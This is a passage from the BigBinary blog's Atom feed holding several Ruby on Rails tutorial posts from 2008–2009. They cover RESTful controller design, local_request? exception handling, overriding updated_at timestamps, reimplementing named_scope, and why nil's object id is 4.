&lt;%= f.label :quality %&gt;&lt;br /&gt;    &lt;%= f.text_field :quality %&gt;  &lt;/p&gt;  &lt;p&gt;    &lt;%= f.submit &quot;Update&quot; %&gt;  &lt;/p&gt;&lt;% end %&gt;&lt;%= link_to 'Show', user_picture_path(@picture) %&gt; |&lt;%= link_to 'All', user_pictures_path %&gt;</code></pre><pre><code class="language-ruby"># new.html.erb&lt;h1&gt;New picture&lt;/h1&gt;&lt;% form_for(:picture, :url =&gt; user_pictures_path, :html =&gt; {:method =&gt; :post}) do |f| %&gt;  &lt;%= f.error_messages %&gt;  &lt;p&gt;    &lt;%= f.label :name %&gt;&lt;br /&gt;    &lt;%= f.text_field :name %&gt;  &lt;/p&gt;  &lt;p&gt;    &lt;%= f.label :quality %&gt;&lt;br /&gt;    &lt;%= f.text_field :quality %&gt;  &lt;/p&gt;  &lt;p&gt;    &lt;%= f.submit &quot;Create&quot; %&gt;  &lt;/p&gt;&lt;% end %&gt;&lt;%= link_to 'All', user_pictures_path %&gt;</code></pre><pre><code class="language-ruby"># show.html.erb&lt;p&gt;  &lt;b&gt;Name:&lt;/b&gt;  &lt;%=h @picture.name %&gt;&lt;/p&gt;&lt;p&gt;  &lt;b&gt;Quality:&lt;/b&gt;  &lt;%=h @picture.quality %&gt;&lt;/p&gt;&lt;%= link_to 'Edit', edit_user_picture_path(:id =&gt; @picture) %&gt; |&lt;%= link_to 'All', user_pictures_path %&gt;</code></pre><h2>Another use case</h2><p>Let's talk about another example. Let's say that we have a model called<code>Project</code> and besides the regular functionality of creating, deleting, updatingand listing projects, one needs two more actions called enable and disableproject.</p><p>Well the projects controller can easily handle two more actions called &quot;enable&quot;and &quot;disable&quot;. However it is a good idea to create another controller called<code>project_status_controller</code> . This controller should have only two actions -<code>create</code> and <code>destroy</code>. <code>destroy</code> in this case would mean disabling the projectand <code>create</code> would mean enabling the project.</p><p>I know it looks counter intuitive. Actions 'enable' and 'disable' seem simplerthan &quot;create&quot; and &quot;destroy&quot;. I agree in the beginning adding more actions topictures controller looks easy. However if we go down that path then it is aslippery slope and we do not know when to stop.</p><p>Compare that with the RESTful design of having only seven action : <code>index</code>,<code>show</code>, <code>new</code>, <code>edit</code>, <code>create</code>, <code>update</code>, <code>destroy</code>. This limits what acontroller can do and that's a good thing. This ensures that a controller doesnot take up too many responsibilities.</p><p>Creating another controller allows all the business logic which is not relatedto one of those seven actions to be somewhere else.</p><h2>One last example</h2><p>Now that we have the ability to &quot;enable&quot; and &quot;disable&quot; pictures how aboutshowing &quot;only active&quot;, &quot;only inactive&quot; and &quot;all&quot; pictures.</p><p>In order to accomplish it once again we can add more actions to the picturescontroller.</p><p>However it is much better to have two new controllers.</p><pre><code class="language-ruby">class Pictures::ActiveController &lt; ApplicationControllerendclass Pictures::InactiveController &lt; ApplicationControllerend</code></pre><p>Some of you must be thinking what's the point of having a controller for thesake of having only one action. Well the point is having code that can bechanged easily and with confidence.</p><h2>Conclusion</h2><p>In this blog I tried to show that it is not necessary to have one to one mappingbetween model and controllers to be restful. It is always a good idea to createa separate controller when the existing controller is burdened with too muchwork.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configure local_request]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rescue_action_in_public-local_request-and-how-to-configure-local_request"/>
      <updated>2009-02-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rescue_action_in_public-local_request-and-how-to-configure-local_request</id>
      <content type="html"><![CDATA[<p>How does Rails handle exceptions ?</p><p>Rails exception handling depends on two factors and we are going to discuss bothof them here.</p><pre><code class="language-ruby"># ~/lib/action_controller/rescue.rbif consider_all_requests_local || local_request?  rescue_action_locally(exception)else  rescue_action_in_public(exception)end</code></pre><p>When exceptions are handled by <code>rescue_action_locally</code> then we get to see thepage with stacktrace. When exceptions are handled by <code>rescue_action_in_public</code>,we get to see the <code>public/500.html</code> or an error page matching the error code.</p><p>As you can see Rails uses two different methods <code>consider_all_requests_local</code>and <code>local_request?</code> to decide how exception should be handled.</p><h2>Method consider_all_requests_local</h2><p><code>consider_all_requests_local</code> is a class level variable for<code>ActionController::Base</code> . We hardly pay attention to it but it is configuredthrough files residing in <code>config/environments</code></p><pre><code class="language-ruby"># config/environments/development.rbconfig.action_controller.consider_all_requests_local = true# config/environments/production.rbconfig.action_controller.consider_all_requests_local = false</code></pre><p>As you can see in development environment all the requests are considered local.</p><h2>I have overridden the method local_request? but I am still not able to see public page when exception is raised.</h2><p>That is a common question I see in the mailing list. As you can see thecondition to decide how to handle exception is</p><pre><code class="language-ruby">if consider_all_requests_local || local_request?</code></pre><p>In development environment <code>consider_all_requests_local</code> is always true as Ishowed before. Since one of the conditions is true Rails always handles theexception <code>using rescue_action_locally</code> .</p><h2>I am running in production mode but I am still not able to see public/500.html page when I get exception at http://localhost:3000.</h2><p>Same issue. In this case you are running in production mode so<code>consider_all_requests_local</code> is <code>false</code> but local_request? is still truebecause of localhost.</p><h2>I want local_request? to be environment dependent</h2><p>Recently I started using hoptoad and I needed to test how hoptoad will handleexception in production mode. However without any change local_request? wasalways returning true for <code>http://localhost:30000</code> .</p><p>Then I stick following file under <code>config/initializers</code></p><pre><code class="language-ruby"># config/initializers/local_request_override.rbmodule CustomRescue  def local_request?    return false if Rails.env.production? || Rails.env.staging?    super  endendActionController::Base.class_eval do  include CustomRescueend</code></pre><p>Now all request in production or in staging mode are treated as NOT local.</p><p>Now in both <code>staging</code> and <code>production</code> mode I get to see 500.html page even if Iam accessing the application from <code>http://localhost:3000</code> .</p>]]></content>
    </entry><entry>
       <title><![CDATA[Override automatic updated_at in ActiveRecord/Rails]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/override-automatic-timestamp-in-activerecord-rails"/>
      <updated>2009-01-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/override-automatic-timestamp-in-activerecord-rails</id>
      <content type="html"><![CDATA[<p>Rails provides some good tools like automatically updating <code>created_at</code> and<code>updated_at</code> columns. Developers do not need to worry about these columns. Railsupdates these columns automatically which is great.</p><p>However I have a unique business need where I need to update a column but I donot want <code>updated_at</code> to be changed. Or we can see the problem this way. I wantto change the <code>updated_at</code> to a particular value.</p><pre><code class="language-ruby">&gt;&gt; User.first.update_attributes(:updated_at =&gt; 100.years.ago)UPDATE `users` SET `updated_at` = '2009-01-20 19:15:25' WHERE `id` = 2</code></pre><p>Look at the sql that is generated. Rails discarded the <code>updated_at</code> value that Ihad supplied and replaced the value by the current time. Rails works fine if yousupply <code>created_at</code> value. It is the <code>updated_at</code> value that is discarded.</p><p>Rails provides a feature called<a href="http://api.rubyonrails.com/classes/ActiveRecord/Timestamp.html">ActiveRecord::Base.record_timestamps</a>. Using this feature I can tell rails to not to auto time stamp records.</p><p>Let's try that.</p><pre><code class="language-ruby">&gt;&gt; User.record_timestamps=false=&gt; false&gt;&gt; User.first.update_attributes(:updated_at =&gt; 100.years.ago)UPDATE `users` SET `updated_at` = '1909-01-20 18:52:50' WHERE `id` = 2&gt;&gt; User.record_timestamps=true=&gt; true</code></pre><p>It worked. I have successfully set <code>updated_at</code> to year 1909. However there is aproblem.</p><p>For a brief duration <code>User.record_timestamps</code> was set to false. That is a classlevel variable. It means that for that brief duration if any other User recordis updated then that record will not have correct <code>updated_at</code> value. That isnot right. I want just one record ( User.first) to not to change <code>updated_at</code>without changing the behavior for the whole application.</p><p>In order to isolate the behavior to only the record we are interested in, I cando this.</p><pre><code class="language-ruby">&gt;&gt; u = User.first&gt;&gt; class &lt;&lt; u&gt;&gt;  def record_timestamps&gt;&gt;    false&gt;&gt;  end&gt;&gt; end&gt;&gt; u.update_attributes(:updated_at =&gt; 100.years.ago)UPDATE `users` SET `updated_at` = '1909-01-20 18:58:10' WHERE `id` = 2&gt;&gt; class &lt;&lt; u&gt;&gt;  def record_timestamps&gt;&gt;    super&gt;&gt;  end&gt;&gt; end&gt;&gt; u.update_attributes(:updated_at =&gt; 200.years.ago)UPDATE `users` SET `updated_at` = '2009-01-20 19:22:11' WHERE `id` = 2</code></pre><p>In order to restrict the changes to a model, I am opening up the metaclass of u( user object) and in that object I am adding a method called<code>record_timestamps</code> . The idea is to insert a method called <code>record_timestamps</code>in the metaclass which will return true and in this way the changes arerestricted to a single object rather than making change at the class level.</p><p>At this point the meta class of the user object has the method<code>record_timestamps</code> and this returns false. Now I update the record with<code>updated_at</code> set to 100 years ago. And I succeed.</p><p>Now I need to put the object behavior back to normal. I open up the metaclassand call super on the method so that the method call will go up the chain. Andthat's what happens when I try to test <code>updated_at</code>. This time the <code>updated_at</code>value that I set is ignored and rails changes the <code>updated_at</code> value.</p><h2><code>update_without_timestamping</code> method</h2><p>This strategy of opening up an instance object works but it is messy. I wouldlike to have a method that is much easier to use and this is what I came upwith. Stick this piece of code in an initializer.</p><pre><code class="language-ruby">module ActiveRecord  class Base    def update_record_without_timestamping      class &lt;&lt; self        def record_timestamps; false; end      end      save!      class &lt;&lt; self        def record_timestamps; super ; end      end    end  endend</code></pre><p>This is how you can use it.</p><pre><code class="language-ruby">&gt;&gt; u = User.first&gt;&gt; u.updated_at = 100.years.ago&gt;&gt; u.created_at = 200.years.ago&gt;&gt; u.update_record_without_timestampingUPDATE `users` SET `created_at` = '1809-01-20 19:08:21',`updated_at` = '1909-01-20 19:08:22' WHERE `id` = 2</code></pre><h2>Good usage of remove_method</h2><p>In the above solution I used super when I want to bring back the default autotime stamping behavior. In stead of super I can also use remove_method. Moreabout the what remove_method does is<a href="https://apidock.com/ruby/Module/remove_method">here</a> .</p><pre><code class="language-ruby">module ActiveRecord  class Base    def update_record_without_timestamping      class &lt;&lt; self        def record_timestamps; false; end      end      save!      class &lt;&lt; self        remove_method :record_timestamps      end    end  endend</code></pre><p>Using the above technique, I can fully control <code>updated_at</code> values without railsmessing up anything.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Under the hood  how named_scope works]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/under-the-hood-how-named-scope-works"/>
      <updated>2008-10-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/under-the-hood-how-named-scope-works</id>
      <content type="html"><![CDATA[<p><em>Following code was tested with ruby 1.8.7 and Rails 2.x</em> .</p><p>Rails recently added named_scope feature and it is a wonderful thing. If youdon't know what <code>named_scope</code> is then you can find out more about it<a href="http://railscasts.com/episodes/108">here</a> .</p><p>This article is not about how to use <code>named_scope</code>. This article is about how<code>named_scope</code> does what it does so well.</p><h2>Understanding with_scope</h2><p>ActiveRecord has something called <code>with_scope</code> which is not associated with<code>named_scope</code>. The two are entirely separate thing. However <code>named_scope</code> relieson the workings on <code>with_scope</code> to do its magic. So in order to understand how<code>named_scope</code> works first let's try to understand what <code>with_scope</code> is.</p><p><code>with_scope</code> let's you add scope to a model in a very extensible manner.</p><pre><code class="language-ruby">def self.all_male  with_scope(:find =&gt; {:conditions =&gt; &quot;gender = 'm'&quot;}) do    all_active  endenddef self.all_active  with_scope(:find =&gt; {:conditions =&gt; &quot;status = 'active'&quot;}) do    find(:first)  endend# User.all_active# SELECT * FROM &quot;users&quot; WHERE (status = 'active') LIMIT 1# User.all_male# SELECT * FROM &quot;users&quot; WHERE ((gender = 'm') AND (status = 'active')) LIMIT 1</code></pre><p>We can see that when <code>User.all_male</code> is called, it internally calls <code>all_active</code>method and the final sql has both the conditions.</p><p><code>with_scope</code> allows nesting and all the conditions nested together are used toform one single query. And <code>named_scope</code> uses this feature of <code>with_scope</code> toform one single query from a lot of named scopes.</p><h2>Writing our own <code>named_scope</code> called <code>mynamed_scope</code></h2><p>The best way to learn <code>named_scope</code> is by implementing the functionality of<code>named_scope</code> ourselves. We will build this functionality incrementally. Toavoid any confusion we will call our implementation <code>mynamed_scope</code>.</p><p>To keep it simple in the first iteration we will not support any lambdaoperation. We will support simple conditions feature. Here is a usage of<code>mynamed_scope</code> .</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  mynamed_scope :active, :conditions =&gt; {:status =&gt;  'active'}  mynamed_scope :male, :conditions =&gt; {:gender =&gt; 'm'}end</code></pre><p>We expect following queries to provide right result.</p><pre><code class="language-ruby">User.activeUser.maleUser.active.maleUser.male.active</code></pre><h2>Let's implement <code>mynamed_scope</code></h2><p>At the top of user.rb add the following lines of code</p><pre><code class="language-ruby">module ActiveRecord  module MynamedScope    def self.included(base)      base.extend ClassMethods    end    module ClassMethods      def mynamed_scope(name,options = {})        puts &quot;name is #{name}&quot;      end    end  endendActiveRecord::Base.send(:include, ActiveRecord::MynamedScope)</code></pre><p>Now in script/console if we do User then the code will not blow up.</p><p>Next we need to implement functionalities so that <code>mynamed_scope</code> creates classmethods like active and male.</p><p>What we need is a class where each <code>mynamed_scope</code> could be stored. If 7<code>mynamed_scopes</code> are defined on User then we should have a way to get referenceto all those <code>mynamed_scopes</code>. We are going to add class level attributemyscopes which will store all the <code>mynamed_scopes</code> defined for that class.</p><pre><code class="language-ruby">def myscopes  read_inheritable_attribute(:myscopes) || write_inheritable_attribute(:myscopes, {})end</code></pre><p>This discussion is going to be tricky.</p><p>We are storing all <code>mynamed_scope</code> information in a variable called myscopes.This will contain all the <code>mynamed_scopes</code> defined on User.</p><p>However we need one more way to track the scoping. When we are executing<code>User.active</code> then the active <code>mynamed_scope</code> should be invoked on the User.However when we perform <code>User.male.active</code> then the <code>mynamed_scope</code> activeshould be performed in the scope of <code>User.male</code> and not directly on User.</p><p>This is really crucial. Let's try one more time. In the case of <code>User.active</code>the condition that was supplied while defining the <code>mynamed_scope</code> <code>active</code>should be acted on User directly. However in the case of <code>User.male.active</code> thecondition that was supplied while defining <code>mynamed_scope</code> <code>active</code> should beapplied on the scope that was returned by <code>User.male</code> .</p><p>So we need a class which will store <code>proxy_scope</code> and <code>proxy_options</code>.</p><pre><code class="language-ruby">class Scope  attr_reader :proxy_scope, :proxy_options  def initialize(proxy_scope, options)    @proxy_scope, @proxy_options = proxy_scope, options  endend # end of class Scope</code></pre><p>Now the question is when do we create an instance of Scope class. The instancemust be created at run time. When we execute <code>User.male.active</code>, until the runtime we don't know the scope object active has to work upon. It means that<code>User.male</code> should return a scope and on that scope active will work upon.</p><p>So for <code>User.male</code> the <code>proxy_scope</code> is the User class. But for<code>User.male.active</code>, <code>mynamed_scope</code> 'active' gets (User.male) as theproxy_scope.</p><p>Also notice that <code>proxy_scope</code> happens to be the value of self.</p><p>Base on all that information we can now write the implementation of<code>mynamed_scope</code> like this.</p><pre><code class="language-ruby">def mynamed_scope(name,options = {})  name = name.to_sym  myscopes[name] = lambda { |proxy_scope| Scope.new(proxy_scope,options) }  (class &lt;&lt; self; self end).instance_eval do    define_method name do      myscopes[name].call(self)    end  endend</code></pre><p>At this point of time the overall code looks like this.</p><pre><code class="language-ruby">module ActiveRecord  module MynamedScope    def self.included(base)      base.extend ClassMethods    end    module ClassMethods      def myscopes        read_inheritable_attribute(:myscopes) || write_inheritable_attribute(:myscopes, {})      end      def mynamed_scope(name,options = {})        name = name.to_sym        myscopes[name] = lambda { |proxy_scope| Scope.new(proxy_scope,options) }        (class &lt;&lt; self; self end).instance_eval do          define_method name do            myscopes[name].call(self)          end        end      end      class Scope        attr_reader :proxy_scope, :proxy_options        def initialize(proxy_scope, options)          @proxy_scope, @proxy_options = proxy_scope, options        end      end # end of class Scope    end # end of module ClassMethods  end # endof module MynamedScopeendActiveRecord::Base.send(:include, ActiveRecord::MynamedScope)class User &lt; ActiveRecord::Base  mynamed_scope :active, :conditions =&gt; {:status =&gt;  'active'}  mynamed_scope :male, :conditions =&gt; {:gender =&gt; 'm'}end</code></pre><p>On script/console</p><pre><code class="language-ruby">&gt;&gt; User.active.inspect  SQL (0.000549)    SELECT name FROM sqlite_master WHERE type = 'table' AND NOT name = 'sqlite_sequence'=&gt; &quot;#&lt;ActiveRecord::MynamedScope::ClassMethods::Scope:0x203201c @proxy_scope=User(id: integer, gender: string, status: string, created_at: datetime, updated_at: datetime), @proxy_options={:conditions=&gt;{:status=&gt;&quot;active&quot;}}&gt;&quot;&gt;&gt;</code></pre><p>What we get is an instance of Scope. What we need is a way to call sql statementat this point of time.</p><p>But calling sql can be tricky. Remember each scope has a reference to the<code>proxy_scope</code> before it. This is the way all the scopes are chained together.</p><p>What we need to do is to start walking through the scope graph and if theprevious <code>proxy_scope</code> is an instance of scope then add the condition from thescope to with_scope and then go to the previous <code>proxy_scope</code>. Keep walking andkeep nesting the with_scope condition until we find the end of chain whenproxy_scope will NOT be an instance of Scope but it will be a sub class ofActiveRecord::Base.</p><p>One way of finding if it is an scope or not is to see if it responds tofind(:all). If the <code>proxy_scope</code> does not respond to find(:all) then keep goingback because in the end User will be able to respond to find(:all) method.</p><pre><code class="language-ruby"># all these two methods to Scope classdef inspect  load_foundenddef load_found  find(:all)end</code></pre><p>Now in script/console you will get undefined method find. That is because findis not implemented by Scope.</p><p>Let's implement method_missing.</p><pre><code class="language-ruby">def method_missing(method, *args, &amp;block)  if proxy_scope.myscopes.include?(method)    proxy_scope.myscopes[method].call(self)  else    with_scope :find =&gt; proxy_options do      proxy_scope.send(method,*args)    end  endend</code></pre><p>Statement User.active.male invokes method 'male' and since method 'male' is notimplemented by Scope, we don't want to call <code>proxy_scope</code> yet since this method'male' might be a <code>mynamed_scope</code>. Hence in the above code a check is done tosee if the method that is missing is a declared <code>mynamed_scope</code> or not. If it isnot a <code>mynamed_scope</code> then the call is sent to <code>proxy_scope</code> for execution. Payattention to with_scope. Because of this with_scope all calls to <code>proxy_scope</code>are nested.</p><p>However Scope class doesn't implement with_scope method. However the first<code>proxy_scope</code> ,which will be User in our case, implements with_scope method. Sowe can delegate with_scope method to <code>proxy_scope</code> like this.</p><pre><code class="language-ruby">delegate :with_scope,  :to =&gt; :proxy_scope</code></pre><p>At this point of time the code looks like this</p><pre><code class="language-ruby">module ActiveRecord  module MynamedScope    def self.included(base)      base.extend ClassMethods    end    module ClassMethods      def myscopes        read_inheritable_attribute(:myscopes) || write_inheritable_attribute(:myscopes, {})      end      def mynamed_scope(name,options = {})        name = name.to_sym        myscopes[name] = lambda { |proxy_scope| Scope.new(proxy_scope,options) }        (class &lt;&lt; self; self end).instance_eval do          define_method name do            myscopes[name].call(self)          end        end      end      class Scope        attr_reader :proxy_scope, :proxy_options        delegate :with_scope,  :to =&gt; :proxy_scope        def initialize(proxy_scope, options)          @proxy_scope, @proxy_options = proxy_scope, options        end        def inspect          load_found        end        def load_found          find(:all)        end        def method_missing(method, *args, &amp;block)          if proxy_scope.myscopes.include?(method)            proxy_scope.myscopes[method].call(self)          else            with_scope :find =&gt; proxy_options do              proxy_scope.send(method,*args)            end          end        end      end # end of class Scope    end # end of module ClassMethods  end # endof module MynamedScopeendActiveRecord::Base.send(:include, ActiveRecord::MynamedScope)class User &lt; ActiveRecord::Base  mynamed_scope :active, :conditions =&gt; {:status =&gt;  'active'}  mynamed_scope :male, :conditions =&gt; {:gender =&gt; 'm'}end</code></pre><p>Let's checkout the result in script/console</p><pre><code class="language-ruby">&gt;&gt; User.activeSELECT * FROM &quot;users&quot; WHERE (&quot;users&quot;.&quot;status&quot; = 'active')&gt;&gt; User.maleSELECT * FROM &quot;users&quot; WHERE (&quot;users&quot;.&quot;gender&quot; = 'm')&gt;&gt; User.active.maleSELECT * FROM &quot;users&quot; WHERE ((&quot;users&quot;.&quot;gender&quot; = 'm') AND (&quot;users&quot;.&quot;status&quot; = 'active'))&gt;&gt; User.male.activeSELECT * FROM &quot;users&quot; WHERE ((&quot;users&quot;.&quot;status&quot; = 'active') AND (&quot;users&quot;.&quot;gender&quot; = 'm'))# you can also see count&gt;&gt; User.active.countSELECT count(*) AS count_all FROM &quot;users&quot; WHERE (&quot;users&quot;.&quot;status&quot; = 'active')=&gt; 2</code></pre><p><code>named_scope</code> supports a lot more things than what we have shown. <code>named_scope</code>supports passing lambda instead of conditions and it also supports joins andextensions.</p><p>However in the process of building <code>mynamed_scope</code> we got to see the workings ofthe <code>named_scope</code> implementation.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Why the id of nil is 4 in Ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/why-the-id-of-nil-is-4-in-ruby"/>
      <updated>2008-06-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/why-the-id-of-nil-is-4-in-ruby</id>
      <content type="html"><![CDATA[<p><em>Following code was tested with ruby 1.8.7 and Rails 2.3</em> .</p><p>While developing rails application you have must seen this</p><pre><code class="language-plaintext">Called id for nil, which would mistakenly be 4  if you reallywanted the id of nil, use object_id</code></pre><p>We all know that this message is added by Rails and it is called <code>whiny nil</code> .If you open your <code>config/development.rb</code> file you will see</p><pre><code class="language-ruby"># Log error messages when you accidentally call methods on nil.config.whiny_nils = true</code></pre><p>Simply stated it means that if the application happens to invoke id on a nilobject then throw an error. Rails assumes that under no circumstance a developerwants to find id of a nil object. So this must be an error case and Rails throwsan exception.</p><p>The question I have is why 4. Why Matz chose the id of nil to be 4.<a href="http://confreaks.tv/videos/mwrc2008-ruby-internals">This awesome presentation</a>on 'Ruby Internals' has the answer.</p><p>In short Matz decided to have all the odd numbers reserved for numerical values.Check this out.</p><pre><code class="language-ruby">&gt; irb&gt;&gt; 0.id(irb):1: warning: Object#id will be deprecated; use Object#object_id=&gt; 1&gt;&gt; 1.id(irb):2: warning: Object#id will be deprecated; use Object#object_id=&gt; 3&gt;&gt; 2.id(irb):3: warning: Object#id will be deprecated; use Object#object_id=&gt; 5&gt;&gt; 3.id(irb):4: warning: Object#id will be deprecated; use Object#object_id=&gt; 7</code></pre><p>Id 1,3,5 and 7 are taken by 0,1,2 and 3.</p><p>Now we are left with the id 0,2,4 and higher values.</p><pre><code class="language-ruby">&gt; irb&gt; FALSE.id(irb):5: warning: Object#id will be deprecated; use Object#object_id=&gt; 0&gt;&gt; TRUE.id(irb):6: warning: Object#id will be deprecated; use Object#object_id=&gt; 2</code></pre><p>FALSE had the id 0 and TRUE has the id 2.</p><p>Now the next available id left is 4 and that is taken by NIL.</p><pre><code class="language-ruby">&gt; irb&gt;&gt; NIL.id(irb):7: warning: Object#id will be deprecated; use Object#object_id=&gt; 4</code></pre><p>We won't even be discussing this issue once 1.9 comes out where we will have touse <code>object_id</code> and then this won't be an issue.</p><p>You can follow more discussion about this article at<a href="https://news.ycombinator.com/item?id=3543695">Hacker news</a> .</p>]]></content>
    </entry>
     </feed>